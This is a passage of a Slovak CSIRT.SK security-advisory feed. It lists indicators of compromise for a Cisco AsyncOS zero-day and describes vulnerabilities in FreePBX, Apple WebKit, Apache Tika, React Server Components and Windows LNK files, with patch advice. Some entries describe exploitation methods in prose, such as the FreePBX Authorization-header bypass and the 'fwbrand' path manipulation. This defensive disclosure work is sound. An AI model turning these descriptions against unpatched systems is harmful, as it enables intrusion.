<p>2db8ad6e0f43e93cc557fbda0271a436f9f2a478b1607073d4ee3d20a87ae7ef<br>145424de9f7d5dd73b599328ada03aa6d6cdcee8d5fe0f7cb832297183dbe4ca<br>85a0b22bd17f7f87566bd335349ef89e24a5a19f899825b4d178ce6240f58bfc<br>2D89FB7455FF3EBF6B965D8B1113857607F7FBDA4C752CCB591DBC1DC14BA0DA<br>47EC51B5F0EDE1E70BD66F3F0152F9EB536D534565DBB7FCC3A05F542DBE4428<br>be1037fac396cf54fb9e25c48e5b0039b3911bb8426cbf52c9433ba06c0685ce<br>3cd5703d285ed2753434f14f8da933010ecfdc1e5009d0e438188aaf85501612<br>3c1b9df801b9abbb3684670822f367b5b8cda566b749f457821b6481606995b3</p>



<p><u>IP adresy</u></p>



<p>172[.]233[.]67[.]176<br>172[.]237[.]29[.]147<br>38[.]54[.]56[.]95</p>



<p><strong>Odkazy:</strong></p>



<ul>
<li><a href="https://nvd.nist.gov/vuln/detail/CVE-2025-20393">https://nvd.nist.gov/vuln/detail/CVE-2025-20393</a></li>



<li><a href="https://sec.cloudapps.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-sma-attack-N9bf4">https://sec.cloudapps.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-sma-attack-N9bf4</a></li>



<li><a href="https://www.bleepingcomputer.com/news/security/cisco-warns-of-unpatched-asyncos-zero-day-exploited-in-attacks/">https://www.bleepingcomputer.com/news/security/cisco-warns-of-unpatched-asyncos-zero-day-exploited-in-attacks/</a></li>



<li><a href="https://blog.talosintelligence.com/uat-9686/">https://blog.talosintelligence.com/uat-9686/</a></li>
</ul>
]]></content:encoded>
					
					<wfw:commentRss>/posts/3002/feed</wfw:commentRss>
			<slash:comments>0</slash:comments>
		
		
			</item>
		<item>
		<title>Mesačná správa CSIRT.SK – november 2025</title>
		<link>/posts/2998</link>
					<comments>/posts/2998#respond</comments>
		
		<dc:creator><![CDATA[Marian Danko]]></dc:creator>
		<pubDate>Wed, 17 Dec 2025 10:49:01 +0000</pubDate>
				<category><![CDATA[Aktuality]]></category>
		<category><![CDATA[Tlačová správa]]></category>
		<category><![CDATA[monthly report]]></category>
		<category><![CDATA[VJCSIRT]]></category>
		<guid isPermaLink="false">/?p=2998</guid>

					<description><![CDATA[<p><img src="/wp-content/uploads/2024/01/prehlad_zranitelnosti-1.jpg" alt="" /></p>V publikovanej správe sa zameriame na dianie v oblasti informačnej bezpečnosti vo svete a na Slovensku v mesiaci november 2025....]]></description>
										<content:encoded><![CDATA[<p><img src="/wp-content/uploads/2024/01/prehlad_zranitelnosti-1.jpg" alt="" /></p>
<p><strong>V publikovanej správe sa zameriame na dianie v oblasti informačnej bezpečnosti vo svete a na Slovensku v mesiaci november 2025. Pridávame aj prehľad kritických zraniteľností produktov a nástrojov.</strong></p>



<p>CSIRT.SK ako vládna jednotka na riešenie počítačových incidentov monitoruje lokálne aj globálne dianie v rámci informačnej bezpečnosti. Štandardne tento príspevok prináša prehľad udalostí a informácií   zozbieraných jednotkou CSIRT.SK pri svojej činnosti.</p>



<p><a href="https://csirt.sk/wp-content/uploads/2025/12/MS202511.pdf" data-type="link" data-id="/wp-content/uploads/2025/02/MS202412.pdf">Mesačná správa – 11/2025 PDF (1 994 KB)</a></p>



<p>Mesačné správy CSIRT.SK sú spracovávané od augusta 2018 a sú dostupné v časti <a href="https://csirt.sk/mesacna-sprava-csirt-sk-a-prehlad-bezpecnostnych-udalosti-vo-svete-a-u-nas">Mesačná správa CSIRT.SK a prehľad bezpečnostných udalostí vo svete a u nás</a>.</p>
]]></content:encoded>
					
					<wfw:commentRss>/posts/2998/feed</wfw:commentRss>
			<slash:comments>0</slash:comments>
		
		
			</item>
		<item>
		<title>Zraniteľnosti FreePBX umožňujú získať kontrolu nad systémom</title>
		<link>/posts/2996</link>
					<comments>/posts/2996#respond</comments>
		
		<dc:creator><![CDATA[Marian Danko]]></dc:creator>
		<pubDate>Tue, 16 Dec 2025 15:08:58 +0000</pubDate>
				<category><![CDATA[Oznámenia a varovania]]></category>
		<category><![CDATA[Varovanie]]></category>
		<category><![CDATA[Bypassing security features]]></category>
		<category><![CDATA[FreePBX]]></category>
		<category><![CDATA[information disclosure]]></category>
		<category><![CDATA[RCE]]></category>
		<guid isPermaLink="false">/?p=2996</guid>

					<description><![CDATA[<p><img src="/wp-content/uploads/2025/09/freepbx-logo-300-215.png" alt="" /></p>Vývojári FreePBX opravili jednu kritickú a dve vysoko závažné zraniteľnosti v&#160;aplikácii FreePBX Endpoint Manager. Kritická zraniteľnosť umožňuje obísť autentifikáciu, zatiaľ...]]></description>
										<content:encoded><![CDATA[<p><img src="/wp-content/uploads/2025/09/freepbx-logo-300-215.png" alt="" /></p>
<p><strong>Vývojári FreePBX opravili jednu kritickú a dve vysoko závažné zraniteľnosti v&nbsp;aplikácii FreePBX Endpoint Manager. Kritická zraniteľnosť umožňuje obísť autentifikáciu, zatiaľ čo ostatné dve dovoľujú získavať a&nbsp;meniť dáta v&nbsp;SQL databáze a&nbsp;nahrávať ľubovoľné súbory.</strong></p>



<p><strong>Zraniteľné systémy:</strong></p>



<ul>
<li>FreePBX 16, verzie staršie ako 16.0.44 a&nbsp;16.0.92</li>



<li>FreePBX 17, verzie staršie ako 17.0.6 a&nbsp;17.0.23</li>
</ul>



<p><strong>Opis činnosti:</strong></p>



<p>Bezpečnostní výskumníci spoločnosti Horizon3.ai odhalili tri závažné zraniteľnosti v open‑source platforme FreePBX. Ich zreťazením môže neautentifikovaný útočník čítať a zapisovať v SQL databáze a nahrávať súbory vrátane webshellov do zraniteľnej aplikácie.</p>



<p><strong>CVE-2025-66039</strong> (CVSSv4.0 skóre 9,3)</p>



<p>Kritická zraniteľnosť umožňujúca obídenie autentifikácie sa nachádza v komponente FreePBX Endpoint Manager. Útočník ju môže zneužiť manipuláciou hlavičky Authorization, v ktorej nastaví hodnotu typu autentifikácie na „webserver“. Nemusí pritom disponovať platnými prihlasovacími údajmi.</p>



<p>Zraniteľnosť nie je možné zneužiť pri štandardnej konfigurácii FreePBX.</p>



<p><strong>CVE-2025-61675</strong> (CVSSv4.0 skóre 8,6)</p>



<p>Vysoko závažná zraniteľnosť v komponente FreePBX Endpoint Manager, ktorá zahŕňa chyby umožňujúce injektovanie SQL dopytov autentifikovanému útočníkovi vo viacerých častiach aplikácie. Tak môže čítať a manipulovať citlivé informácie v databáze.</p>



<p><strong>CVE-2025-61678</strong> (CVSSv4.0 skóre 8,6)</p>



<p>Vysoko závažná zraniteľnosť v komponente FreePBX Endpoint Manager, ktorá umožňuje autentifikovanému útočníkovi zneužiť koncový bod pre nahrávanie firmvéru a nahrávať ľubovoľné súbory. Chyba zabezpečenia sa nachádza v parametri „fwbrand“, ktorý umožňuje meniť súborové cesty. Útočník môže získať prístup ku zraniteľnému systému nahratím webshellu alebo môže vzdialene vykonávať kód.</p>



<p><strong>Možné škody:</strong></p>



<ul>
<li><strong>Únik citlivých informácií</strong></li>



<li><strong>Obídenie bezpečnostných prvkov</strong></li>



<li><strong>Vzdialené vykonávanie kódu</strong></li>
</ul>



<p><strong>Odporúčania:</strong></p>



<p>Bezodkladná aktualizácia FreePBX aspoň na verziu 16.0.44, 16.0.92, 17.0.6, alebo 17.0.23.</p>



<p>Pre mitigáciu zraniteľnosti CVE-2025-66039 nastavte &#8220;Authorization Type&#8221; na &#8220;usermanager&#8221;, vypnite v pokročilých nastaveniach parametre „Display Friendly Name<strong>“, „</strong>Display Readonly Settings“ a „Override Readonly Settings“ a reštartujte systém. Podrobnejší návod nájdete <a href="https://github.com/FreePBX/security-reporting/security/advisories/GHSA-9jvh-mv6x-w698">tu</a>.</p>



<p><strong>Odkazy:</strong></p>



<ul>
<li><a href="https://horizon3.ai/attack-research/the-freepbx-rabbit-hole-cve-2025-66039-and-others/">https://horizon3.ai/attack-research/the-freepbx-rabbit-hole-cve-2025-66039-and-others/</a></li>



<li><a href="https://thehackernews.com/2025/12/freepbx-authentication-bypass-exposed.html">https://thehackernews.com/2025/12/freepbx-authentication-bypass-exposed.html</a></li>



<li><a href="https://nvd.nist.gov/vuln/detail/CVE-2025-66039">https://nvd.nist.gov/vuln/detail/CVE-2025-66039</a></li>



<li><a href="https://nvd.nist.gov/vuln/detail/CVE-2025-61675">https://nvd.nist.gov/vuln/detail/CVE-2025-61675</a></li>



<li><a href="https://nvd.nist.gov/vuln/detail/CVE-2025-61678">https://nvd.nist.gov/vuln/detail/CVE-2025-61678</a></li>
</ul>
]]></content:encoded>
					
					<wfw:commentRss>/posts/2996/feed</wfw:commentRss>
			<slash:comments>0</slash:comments>
		
		
			</item>
		<item>
		<title>Apple opravila aktívne zneužívané zraniteľnosti svojich OS a prehliadača</title>
		<link>/posts/2993</link>
					<comments>/posts/2993#respond</comments>
		
		<dc:creator><![CDATA[Marian Danko]]></dc:creator>
		<pubDate>Mon, 15 Dec 2025 14:08:37 +0000</pubDate>
				<category><![CDATA[Oznámenia a varovania]]></category>
		<category><![CDATA[Varovanie]]></category>
		<category><![CDATA[Apple]]></category>
		<category><![CDATA[information disclosure]]></category>
		<category><![CDATA[RCE]]></category>
		<category><![CDATA[WebKit]]></category>
		<guid isPermaLink="false">/?p=2993</guid>

					<description><![CDATA[<p><img src="/wp-content/uploads/2024/11/Apple-Logo-1024x812.png" alt="" /></p>Apple vydala aktualizácie na opravu dvoch zero-day zraniteľností, ktoré sa nachádzajú v nástroji WebKit prehliadača Safari a ďalších prehliadačov na...]]></description>
										<content:encoded><![CDATA[<p><img src="/wp-content/uploads/2024/11/Apple-Logo-1024x812.png" alt="" /></p>
<p><strong>Apple vydala aktualizácie na opravu dvoch zero-day zraniteľností, ktoré sa nachádzajú v nástroji WebKit prehliadača Safari a ďalších prehliadačov na iOS a&nbsp;knižnici ANGLE pre Google Chrome pre Mac. CVE-2025-43529 umožňuje vykonávanie ľubovoľného kódu a možno ju zneužiť spracovaním škodlivého webového obsahu. CVE-2025-14174 môže viesť k poškodeniu pamäte.</strong></p>



<p><strong>Zraniteľné systémy:</strong></p>



<ul>
<li><strong>iOS 26.2, iPadOS 26.2</strong> &#8211; iPhone 11 a novšie, iPad Pro 12.9-inch 3rd generation a novšie, iPad Pro 11-inch 1st generation a novšie, iPad Air 3rd generation a novšie, iPad 8th generation a novšie, iPad mini 5th generation a novšie</li>



<li><strong>iOS 18.7.3, iPadOS 18.7.3</strong> &#8211; iPhone XS a novšie, iPad Pro 13-inch, iPad Pro 12.9-inch 3rd generation a novšie, iPad Pro 11-inch 1st generation a novšie, iPad Air 3rd generation a novšie, iPad 7th generation a novšie, iPad mini 5th generation a novšie</li>



<li><strong>macOS Tahoe 26.2</strong> – zariadenia Mac s macOS Tahoe</li>



<li><strong>tvOS 26.2</strong> &#8211; Apple TV HD a Apple TV 4K (všetky modely)</li>



<li><strong>watchOS 26.2</strong> &#8211; Apple Watch Series 6 a novšie</li>



<li><strong>visionOS 26.2</strong> &#8211; Apple Vision Pro (všetky modely)</li>



<li><strong>Safari 26.2</strong> – zariadenia Mac s macOS Sonoma a Sequoia</li>



<li><strong>Google Chrome pre Mac</strong> verzie staršej ako 143.0.7499.110</li>
</ul>



<p><strong>Opis činnosti:</strong></p>



<p>Spoločnosť Apple opravila dve vysoko závažné zraniteľnosti v nástroji WebKit, ktoré útočníci aktívne zneužívajú. Jedna z nich je obsiahnutá aj v grafickej knižnici ANGLE verzie prehliadača Google Chrome pre Mac. Zraniteľnosti zasahujú široké spektrum operačných systémov a zariadení Apple.</p>



<p><strong>CVE-2025-14174</strong> (CVSS skóre 8,8)</p>



<p>Zraniteľnosť nástroja WebKit umožňuje pristupovať k pamäti mimo povolené hodnoty. Útočník ju môže zneužiť pomocou špeciálne vytvorenej HTML webovej stránky.</p>



<p><strong>CVE-2025-43529</strong></p>



<p>Zraniteľnosť nástroja WebKit vyplýva z možnosti použitia dealokovaného miesta v pamäti. Umožňuje vykonávať ľubovoľný kód pri spracúvaní škodlivého webového obsahu.</p>



<p><strong>Možné škody:</strong></p>



<ul>
<li><strong>Únik citlivých informácií</strong></li>



<li><strong></strong><strong>Vzdialené vykonávanie kódu</strong></li>
</ul>



<p><strong>Odporúčania:</strong></p>



<p>Bezodkladná aktualizácia zasiahnutých systémov a zariadení aspoň na verzie:</p>



<ul>
<li>iOS 26.2, iPadOS 26.2</li>



<li>iOS 18.7.3, iPadOS 18.7.3</li>



<li>macOS Tahoe 26.2</li>



<li>tvOS 26.2</li>



<li>watchOS 26.2</li>



<li>visionOS 26.2</li>



<li>Safari 26.2</li>



<li>Google Chrome pre Mac 143.0.7499.110</li>
</ul>



<p><strong>Odkazy:</strong></p>



<ul>
<li><a href="https://support.apple.com/en-us/125884">https://support.apple.com/en-us/125884</a></li>



<li><a href="https://thehackernews.com/2025/12/apple-issues-security-updates-after-two.html">https://thehackernews.com/2025/12/apple-issues-security-updates-after-two.html</a></li>



<li><a href="https://nvd.nist.gov/vuln/detail/CVE-2025-14174">https://nvd.nist.gov/vuln/detail/CVE-2025-14174</a></li>
</ul>
]]></content:encoded>
					
					<wfw:commentRss>/posts/2993/feed</wfw:commentRss>
			<slash:comments>0</slash:comments>
		
		
			</item>
		<item>
		<title>Kritická zraniteľnosť Apache Tika umožňuje injektovať XML</title>
		<link>/posts/2990</link>
					<comments>/posts/2990#respond</comments>
		
		<dc:creator><![CDATA[Marian Danko]]></dc:creator>
		<pubDate>Mon, 08 Dec 2025 12:59:19 +0000</pubDate>
				<category><![CDATA[Oznámenia a varovania]]></category>
		<category><![CDATA[Varovanie]]></category>
		<category><![CDATA[Apache]]></category>
		<category><![CDATA[information disclosure]]></category>
		<category><![CDATA[RCE]]></category>
		<category><![CDATA[Tika]]></category>
		<guid isPermaLink="false">/?p=2990</guid>

					<description><![CDATA[<p><img src="/wp-content/uploads/2025/12/Apache_Tika.png" alt="" /></p>Vývojári Apache Tika vydali opravné aktualizácie pre viacero modulov, do&#160;ktorých je možné injektovať externé entity XML. Zneužitím opravenej zraniteľnosti môže...]]></description>
										<content:encoded><![CDATA[<p><img src="/wp-content/uploads/2025/12/Apache_Tika.png" alt="" /></p>
<p><strong>Vývojári Apache Tika vydali opravné aktualizácie pre viacero modulov, do&nbsp;ktorých je možné injektovať externé entity XML. Zneužitím opravenej zraniteľnosti môže útočník získať schopnosť čítať citlivé dáta alebo vzdialene vykonávať kód.</strong></p>



<p><strong>Zraniteľné systémy:</strong></p>



<ul>
<li>Apache Tika core (org.apache.tika:tika-core) 1.13 až 3.2.1</li>



<li>Apache Tika parsers (org.apache.tika:tika-parsers) 1.13 až 1.28.5</li>



<li>Apache Tika PDF parser module (org.apache.tika:tika-parser-pdf-module) 2.0.0 až 3.2.1</li>
</ul>



<p><strong>Opis činnosti:</strong></p>



<p><strong>CVE-2025-66516</strong> (CVSSv4 skóre 10,0)</p>



<p>Vývojári Apache Tika opravili kritickú zraniteľnosť umožňujúcu injektovanie externého XML (útoky typu XXE) pomocou špeciálne vytvoreného súboru XFA vloženého v PDF. Útočník tak získa schopnosť čítať citlivé dáta, pristupovať ku interným zdrojom, a v najzávažnejšom prípade aj vzdialene vykonávať kód.</p>



<p>Zraniteľnosť je rozšírením predošlej CVE-2025-54988 o ďalšie zraniteľné moduly.</p>



<p><strong>Možné škody:</strong></p>



<ul>
<li><strong>Únik citlivých informácií</strong></li>



<li><strong>Vzdialené vykonávanie kódu</strong></li>
</ul>



<p><strong>Odporúčania:</strong></p>



<p>Bezodkladná aktualizácia Apache Tika-core a Tika-parser-pdf-module na verziu 3.2.2 a Tika-parsers na 2.0.0.</p>



<p><strong>Odkazy:</strong></p>



<ul>
<li><a href="https://lists.apache.org/thread/s5x3k93nhbkqzztp1olxotoyjpdlps9k">https://lists.apache.org/thread/s5x3k93nhbkqzztp1olxotoyjpdlps9k</a></li>



<li><a href="https://www.cve.org/CVERecord?id=CVE-2025-54988">https://www.cve.org/CVERecord?id=CVE-2025-54988</a></li>



<li><a href="https://www.cve.org/CVERecord?id=CVE-2025-66516">https://www.cve.org/CVERecord?id=CVE-2025-66516</a></li>



<li><a href="https://thehackernews.com/2025/12/critical-xxe-bug-cve-2025-66516-cvss.html">https://thehackernews.com/2025/12/critical-xxe-bug-cve-2025-66516-cvss.html</a></li>
</ul>
]]></content:encoded>
					
					<wfw:commentRss>/posts/2990/feed</wfw:commentRss>
			<slash:comments>0</slash:comments>
		
		
			</item>
		<item>
		<title>Kritická zraniteľnosť React Server Components umožňuje vykonávať kód</title>
		<link>/posts/2986</link>
					<comments>/posts/2986#respond</comments>
		
		<dc:creator><![CDATA[Marian Danko]]></dc:creator>
		<pubDate>Fri, 05 Dec 2025 13:46:36 +0000</pubDate>
				<category><![CDATA[Oznámenia a varovania]]></category>
		<category><![CDATA[Varovanie]]></category>
		<category><![CDATA[Next.js]]></category>
		<category><![CDATA[RCE]]></category>
		<category><![CDATA[React]]></category>
		<category><![CDATA[React Server Components]]></category>
		<category><![CDATA[React2Shell]]></category>
		<guid isPermaLink="false">/?p=2986</guid>

					<description><![CDATA[<p><img src="/wp-content/uploads/2025/12/react.png" alt="" /></p>Vývojári platformy JavaScript React opravili kritickú zraniteľnosť v React Server Components, ktorá umožňuje vzdialené vykonávanie kódu na serveri. Zasiahnuté sú...]]></description>
										<content:encoded><![CDATA[<p><img src="/wp-content/uploads/2025/12/react.png" alt="" /></p>
<p><strong>Vývojári platformy JavaScript React</strong><strong> opravili kritickú zraniteľnosť v React Server Components, ktorá umožňuje vzdialené vykonávanie kódu na serveri. Zasiahnuté sú viaceré balíčky npm, vrátane platformy Next.js. Zraniteľnosť dostala pomenovanie React2Shell.</strong></p>



<p><strong>Zraniteľné systémy:</strong></p>



<ul>
<li>React Server Components (react-server-dom-parcel, react-server-dom-turbopack, react-server-dom-webpack) 19.0.0, 19.1.0, 19.1.1, 19.2.0</li>



<li>Next.js verzie 15.0.4, 15.1.8, 15.2.5, 15.3.5, 15.4.7, 15.5.6, 16.0.6 a&nbsp;staršie</li>



<li>Next.js verzie canary, od 14.3.0-canary.77</li>



<li>Platformy react-router, waku, @parcel/rsc, @vitejs/plugin-rsc, rwsdk, expo, &#8230;</li>
</ul>



<p><strong>Opis činnosti:</strong></p>



<p><strong>CVE-2025-55182</strong> (CVSS skóre 10,0)</p>



<p>Vývojári platformy React opravili kritickú zraniteľnosť v React Server Components, ktorá vyplýva z nezabezpečenej deserializácie dát z klientskych požiadaviek HTTP na koncové body React Server Function. Zraniteľnosť dostala názov React2Shell. Zraniteľné sú balíčky <em>react-server-dom-parcel</em>, <em>react-server-dom-turbopack</em> a <em>react-server-dom-webpack</em>. Neautentifikovaný útočník môže vzdialene vykonávať kód na serveri. K tomu nepotrebuje interakciu obete.</p>



<p>Pre zraniteľnosť existuje verejne dostupný kód ukážky jej zneužitia.</p>



<p>Vývojári publikovali zoznam zraniteľných platforiem a bundlerov na báze React: <em>next</em>, <em>react-router</em>, <em>waku</em>, <em>@parcel/rsc</em>, <em>@vitejs/plugin-rsc</em> a <em>rwsdk</em>. Spoločnosť Tenable pridala platformu <em>expo</em>. Zraniteľnosť zasahuje prakticky všetky platformy využívajúce protokol React Flight.</p>



<p>Aplikácie s podporou React Server Components sú pravdepodobne zraniteľné, aj keď nepoužívajú Server Functions. Zraniteľnosť sa netýka aplikácií postavených na React, pokiaľ nepoužívajú server, platformu, bundler, alebo bundler plugin, ktoré podporujú React Server Components.</p>



<p><strong>Možné škody:</strong></p>



<ul>
<li><strong>Vzdialené vykonávanie kódu</strong></li>
</ul>



<p><strong>Odporúčania:</strong></p>



<p>Bezodkladná aktualizácia React aspoň na verzie 19.0.1, 19.1.2, alebo 19.2.1. Alternatívne, návrat ku najnovšej stabilnej verzii 14.x z verzií canary.</p>



<p>Pre aktualizáciu jednotlivých balíčkbov npm spojených z React, resp. platforiem, ktoré majú pribalené React Server Components , vrátane Next.js, nájdete <a href="https://react.dev/blog/2025/12/03/critical-security-vulnerability-in-react-server-components">návod na stránke</a> vývojára.</p>



<p><strong>Odkazy:</strong></p>



<ul>
<li><a href="https://nvd.nist.gov/vuln/detail/CVE-2025-55182">https://nvd.nist.gov/vuln/detail/CVE-2025-55182</a></li>



<li><a href="https://react2shell.com/">https://react2shell.com/</a></li>



<li><a href="https://react.dev/blog/2025/12/03/critical-security-vulnerability-in-react-server-components">https://react.dev/blog/2025/12/03/critical-security-vulnerability-in-react-server-components</a></li>



<li><a href="https://www.tenable.com/blog/react2shell-cve-2025-55182-react-server-components-rce">https://www.tenable.com/blog/react2shell-cve-2025-55182-react-server-components-rce</a></li>



<li><a href="https://www.aikido.dev/blog/react-nextjs-cve-2025-55182-rce">https://www.aikido.dev/blog/react-nextjs-cve-2025-55182-rce</a></li>
</ul>
]]></content:encoded>
					
					<wfw:commentRss>/posts/2986/feed</wfw:commentRss>
			<slash:comments>0</slash:comments>
		
		
			</item>
		<item>
		<title>Microsoft opravil dlhodobo zneužívanú vlastnosť súborov LNK</title>
		<link>/posts/2984</link>
					<comments>/posts/2984#respond</comments>
		
		<dc:creator><![CDATA[Marian Danko]]></dc:creator>
		<pubDate>Fri, 05 Dec 2025 13:43:44 +0000</pubDate>
				<category><![CDATA[Oznámenia a varovania]]></category>
		<category><![CDATA[Varovanie]]></category>
		<category><![CDATA[LNK]]></category>
		<category><![CDATA[Microsoft]]></category>
		<category><![CDATA[RCE]]></category>
		<category><![CDATA[Windows]]></category>
		<guid isPermaLink="false">/?p=2984</guid>

					<description><![CDATA[<p><img src="/wp-content/uploads/2025/12/MicrosoftLogo-4238232498.jpg" alt="" /></p>Spoločnosť Microsoft opravila v rámci novembrového Patch Tuesday vysoko závažnú zraniteľnosť súborov .LNK. Chyba umožňuje útočníkom zaviesť obeť a ukryť...]]></description>
										<content:encoded><![CDATA[<p><img src="/wp-content/uploads/2025/12/MicrosoftLogo-4238232498.jpg" alt="" /></p>
<p><strong>Spoločnosť Microsoft opravila v rámci novembrového Patch Tuesday vysoko závažnú zraniteľnosť súborov .LNK. Chyba umožňuje útočníkom zaviesť obeť a ukryť do súboru odkazu .LNK príkaz na vykonanie škodlivého kódu alebo skript. Zraniteľnosť je aktívne zneužívaná minimálne od roku 2017.</strong></p>



<p><strong>Zraniteľné systémy:</strong></p>



<ul>
<li>Operačné systémy Microsoft Windows<strong></strong></li>
</ul>



<p><strong>Opis činnosti:</strong></p>



<p><strong>CVE-2025-9491</strong> (CVSSv3.1 skóre 7,8)</p>



<p>Spoločnosť Microsoft opravila v&nbsp;rámci novembrového Patch Tuesday vysoko závažnú zraniteľnosť súborov .LNK. Chybu umožňujúcu zaviesť obeť a&nbsp;ukryť do odkazu príkaz na vykonanie škodlivého kódu zneužívajú útočníci aspoň od roku 2017, vrátane minimálne 11tich štátmi sponzorovaných skupín z&nbsp;Číny, Ruska, Iránu a&nbsp;Severnej Kórei.</p>



<p>Chyba súvisí so skutočnosťou, že v&nbsp;rámci UI pole premennej Target vo vlastnostiach súboru .LNK zobrazuje maximálne 260 znakov, pričom samotná premenná môže mať dĺžku rádovo v&nbsp;desiatkach tisíc znakov. Útočníkovi tak umožňuje využiť napríklad „prázdne“ znaky (medzery, &#8230;) pre vizuálne ukrytie odkazu na škodlivý súbor, alebo aj celý škodlivý skript. Používateľ uvidí vo vlastnostiach súboru .LNK v&nbsp;premennej Target iba časť odkazu smerujúcu na legitímny súbor a&nbsp;prázdne znaky. Keď obeť takýto súbor otvorí, útočník získa schopnosť vzdialene vykonať kód s&nbsp;oprávneniami obete.</p>



<p>Chybu nahlásilo spoločnosti Microsoft v&nbsp;posledných rokoch viacero výskumníkov, naposledy v&nbsp;marci 2025 tím Trend Micro Zero Day Initiative spolu s&nbsp;informáciou o&nbsp;jej aktívnom zneužívaní<strong>.</strong></p>



<p><strong>Možné škody:</strong></p>



<ul>
<li><strong>Vzdialené vykonávanie kódu</strong></li>
</ul>



<p><strong>Odporúčania:</strong></p>



<p>Bezodkladná inštalácia novembrového balíka opráv Patch Tuesday.</p>



<p><strong>Odkazy:</strong></p>



<ul>
<li><a href="https://nvd.nist.gov/vuln/detail/CVE-2025-9491">https://nvd.nist.gov/vuln/detail/CVE-2025-9491</a></li>



<li><a href="https://thehackernews.com/2025/12/microsoft-silently-patches-windows-lnk.html">https://thehackernews.com/2025/12/microsoft-silently-patches-windows-lnk.html</a></li>



<li><a href="https://msrc.microsoft.com/update-guide/advisory/ADV25258226">https://msrc.microsoft.com/update-guide/advisory/ADV25258226</a></li>



<li><a href="https://blog.0patch.com/2025/12/microsoft-silently-patched-cve-2025.html">https://blog.0patch.com/2025/12/microsoft-silently-patched-cve-2025.html</a></li>
</ul>
]]></content:encoded>
					
					<wfw:commentRss>/posts/2984/feed</wfw:commentRss>
			<slash:comments>0</slash:comments>
		
		
			</item>
		<item>
		<title>Mesačný prehľad kritických zraniteľností november 2025</title>
		<link>/posts/2980</link>
					<comments>/posts/2980#respond</comments>
		
		<dc:creator><![CDATA[Marian Danko]]></dc:creator>
		<pubDate>Mon, 01 Dec 2025 13:30:36 +0000</pubDate>
				<category><![CDATA[Aktuality]]></category>
		<category><![CDATA[Tlačová správa]]></category>
		<category><![CDATA[monthly report]]></category>
		<category><![CDATA[VJCSIRT]]></category>
		<guid isPermaLink="false">/?p=2980</guid>

					<description><![CDATA[<p><img src="/wp-content/uploads/2024/01/charts-1.jpg" alt="" /></p>Na našej web stránke boli doplnené informácie o závažných bezpečnostných udalostiach a zraniteľnostiach informačných systémov zaznamenaných v mesiaci november 2025....]]></description>
										<content:encoded><![CDATA[<p><img src="/wp-content/uploads/2024/01/charts-1.jpg" alt="" /></p>
<p>Na našej web stránke boli doplnené informácie o závažných bezpečnostných udalostiach a zraniteľnostiach informačných systémov zaznamenaných v mesiaci november 2025.</p>



<p><a href="https://csirt.sk/wp-content/uploads/2025/12/2025_11_mesacnik.pdf" data-type="link" data-id="/wp-content/uploads/2024/12/2024_11_mesacnik.pdf">Mesačný prehľad – 11/2025 PDF (523 kB)</a></p>



<p>Prehľady sú spracovávané od októbra 2014 a sú dostupné na <a href="https://csirt.sk/mesacny-prehlad-kritickych-a-zavaznych-softver">tomto odkaze</a>.</p>
]]></content:encoded>
					
					<wfw:commentRss>/posts/2980/feed</wfw:commentRss>
			<slash:comments>0</slash:comments>
		
		
			</item>
		<item>
		<title>Microsoft v októbri ukončil podporu Exchange Server 2016 a 2019. Poskytuje rozšírenú podporu v rámci Exchange Subscription Edition.</title>
		<link>/posts/2976</link>
					<comments>/posts/2976#respond</comments>
		
		<dc:creator><![CDATA[Marian Danko]]></dc:creator>
		<pubDate>Fri, 28 Nov 2025 12:52:48 +0000</pubDate>
				<category><![CDATA[Oznámenia a varovania]]></category>
		<category><![CDATA[Oznámenie]]></category>
		<category><![CDATA[Exchange Server]]></category>
		<category><![CDATA[Microsoft]]></category>
		<guid isPermaLink="false">/?p=2976</guid>

					<description><![CDATA[<p><img src="/wp-content/uploads/2025/12/MicrosoftLogo-4238232498.jpg" alt="" /></p>Spoločnosť Microsoft plánovane ukončila 14. októbra 2025 podporu pre Exchange Server verzie 2016 a 2019. Tieto produkty nebudú ďalej dostávať...]]></description>
										<content:encoded><![CDATA[<p><img src="/wp-content/uploads/2025/12/MicrosoftLogo-4238232498.jpg" alt="" /></p>
<p>Spoločnosť Microsoft plánovane ukončila 14. októbra 2025 podporu pre Exchange Server verzie 2016 a 2019. Tieto produkty nebudú ďalej dostávať aktualizácie zabezpečenia, opravy chýb, technickú podporu a&nbsp;ani aktualizácie časových zón. Spoločnosť však od júla 2025 poskytuje verziu Exchange Server Subscription Edition (SE), ktorá umožňuje zachovať podporovaný lokálny mailový server Exchange.</p>



<p>Koexistencia verzie SE so staršími nepodporovanými verziami v&nbsp;rámci organizácie bude obmedzená v&nbsp;závislosti od nainštalovanej kumulatívnej aktualizácie. Tieto podmienky sa týkajú lokálnych a hybridných inštancií, ako aj inštancií využívajúcich iba manažmentové nástroje. Bližšie informácie nájdete na <a href="https://techcommunity.microsoft.com/blog/exchange/upgrading-your-organization-from-current-versions-to-exchange-server-se/4241305">stránkach Microsoftu</a>.</p>



<p>Pokiaľ používate verziu Exchange Server 2019 CU15, verziu SE (RTM) budete môcť nainštalovať formou kumulatívnej aktualizácie <a href="https://techcommunity.microsoft.com/blog/exchange/why-%E2%80%9Cin-place-upgrade%E2%80%9D-from-exchange-2019-to-exchange-se-is-low-risk/4410173">bez potreby migrácie</a> (tzv. in-place upgrade). Nebudete potrebovať nový licenčný kľúč. Ak používate staršie verzie, potrebujete vykonať tzv. legacy upgrade, teda mailový server&nbsp;premigrovať.</p>



<p>Exchange Server SE je po 14. októbri jediná podporovaná verzia Microsoft Exchange Server. Spoločnosť sa zaviazala udržiavať ju aspoň do roku 2035.</p>



<p><strong>Odporúčania:</strong></p>



<p>Administrátorom a&nbsp;používateľom verzií Exchange Server, ktorých podpora skončila, odporúča spoločnosť Microsoft prejsť na verziu <a href="https://techcommunity.microsoft.com/blog/exchange/upgrading-your-organization-from-current-versions-to-exchange-server-se/4241305">Exchange Server Subscription Edition (SE)</a>, <a href="https://learn.microsoft.com/sk-sk/exchange/mailbox-migration/decide-on-a-migration-path">Exchange Online</a>, alebo platformu Microsoft 365.</p>



<p>Ak používate Exchange Server 2019, pre hladší prechod na verziu SE môžete najprv aktualizovať na <a href="https://www.microsoft.com/en-us/download/details.aspx?id=106402">CU15</a>.</p>



<p><strong>Zdroje:</strong></p>



<ul>
<li><a href="https://techcommunity.microsoft.com/blog/exchange/t-6-months-exchange-server-2016-and-exchange-server-2019-end-of-support/4403017">https://techcommunity.microsoft.com/blog/exchange/t-6-months-exchange-server-2016-and-exchange-server-2019-end-of-support/4403017</a></li>



